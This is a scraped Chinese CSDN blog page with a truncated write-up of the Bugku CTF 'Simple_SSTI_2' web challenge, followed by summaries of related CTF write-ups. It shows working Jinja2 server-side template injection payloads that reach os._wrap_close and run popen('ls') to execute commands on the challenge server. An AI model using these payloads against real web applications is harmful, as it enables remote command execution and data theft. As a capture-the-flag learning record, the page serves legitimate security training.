Bugku解题 web (一)

最新推荐文章于 2024-05-03 21:15:47 发布
最新推荐文章于 2024-05-03 21:15:47 发布
阅读量1.6w 收藏 16
点赞数 6
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/115073413
版权

Bugku解题 web


介绍:记录解题过程

1 Simple_SSTI_2

python模仿注入(SSTI)

  1. 通过以下语句拿到可用的类的列表
http://114.67.246.176:13299/?flag={
   {%22%22.__class__.__bases__[0].__subclasses__()}}

在这里插入图片描述

  1. 我们需要的是os命令执行类<class ‘os._wrap_close’>
    在这里插入图片描述

  2. 利用逗号定位
    在这里插入图片描述

  3. 我们可以先看一下我们索引的是否正确,输入url

/?flag={
   {
   "".__class__.__bases__[0].__subclasses__()[127]}}

在这里插入图片描述

  1. 构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令
/?flag={
   {
   "".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}

在这里插入图片描述

Dockerfile app.py flag gunicorn.conf.py templates
  1. 读flag
/?flag={
   {
   "".__class__.__bases__[0
最低0.47元/天 解锁文章
一个平凡de人
关注
  • 6
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 5873
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTF WEB解题记录 1-5
aap49042的博客
08-06 311
写了一部分的web题,算是把它最基础的一部分做了一遍,以后的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每五道题的题解以一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ web2 打开链接http://120.24.86.145:8002/web2/ 看到的是一个充满滑稽脸的网页 ,这个题目很简单 我们直接利用F12查看...
2024年网络安全最新CTF BugKu平台———(Web篇②)_buktu攻防平台
2401_84264244的博客
05-03 805
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。大概的意思就是v1不等于v2,v1和v2的md5相等,strcmp是比较字符串(区分大小写),v3不等于flag。(考的MD5碰撞,网上有很多随便找一个即可。最后就是项目实战,这里带来的是。
bugku题解-web
qq_51775369的博客
10-08 1734
1.滑稽 进去发现很多滑稽脸,直接f12开发者,就能看到flag 2.
BUGKU刷题——WEB
D.MIND 的博客
12-28 278
<meta http-equiv="refresh" content="3"> 3秒之后刷新本页面或访问指定页面 < meta http-equiv="Refresh" content="秒数; url=跳转的文件或地址" > 设置http-equiv中的refresh属性,可以设置网页3秒之后刷新本页面或访问指定页面 双引号转义问题,JS的转义是使用斜杠 " / " 对于eval函数,参数需要是字符串,且为可执行的函数 eval("alert("\141\75\14
BUGKU--web详解
qq_49422880的博客
05-28 1931
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
web后端开发-实现web端线上答题程序
05-15
web后端开发-实现web端线上答题程序
CTF Web各种题目的解题姿势
07-27
课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入实验 - POST注入13'34 课时11:SQL注入常用基础Trick18'15 第2章 代码执行与命令执行 课时1:...
ctf web解题 找flag夺旗赛
最新发布
05-19
ctf web解题 找flag夺旗赛
<Bugku>web解题思路与过程
weixin_45664911的博客
11-03 804
Bugku (https://ctf.bugku.com/) 第一题:web2(http://123.206.87.240:8002/web2/) 查看源代码:Ctrl+U 检查: Ctrl+Shift+I 查看源代码只可查看代码,不可修改。检查两者兼可。 查看源代码 绿色字体即为flag 第二题:随机数字验证码(http://123.206.87.240:8002/yanzhengma...
bugku web方向所有题解
kekefen01的博客
04-18 3061
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
bugku web题集锦
skysys的研究小屋
06-01 1222
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugku-web 前35题详解 (当然除去题目失效)
team39的博客
05-10 1715
第二题:计算器 尝试输入96,发现只能输入一位数字,于是输入“9”,点击验证,弹出“输入有误!” F12查看网页源代码,发现输入框的最大长度是1。 于是更改最大长度为100,输入正确答案96,得到flag。 第三题:web基础$_GET 题目分析:根据题面和所给代码,判断出是一道GET传参的题。GET传参时请求的参数是在URL中,所以直接在网址后面加上?what=flag。 第四题:web基础$_POST 题目分析:根据题面和所给代码,判断出是一道POST传参的题。
ctf bugku
weixin_51387754的博客
08-13 1810
bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag
近日份CTF(2022.11.8)
weixin_45440843的博客
11-08 829
config是Flask模板中的一个全局变量,包含了所有应用程序配置的值。打开url后发现没有任何提示,查看源代码有一行提示。经过尝试发现此题目使用{{}} 进行回显。可知框架类型为Flask。题目解释为简单模板注入。
Bugku、i春秋解题 web wp(一)
m0_55854679的博客
05-14 766
Simple_SSTI_1(python模板注入) 启动常见后只有一行字母,我们什么也看不出来。点击右键,查看网页源代码 倒数第三行绿色的字 <!-- You know, in the flask, We often set a secret_key variable.--> 意思是 你知道,在flask【一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。】里,我们经常设置一个secret_key变量,所以我们要读secret_key变量,导
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5734
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入。
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值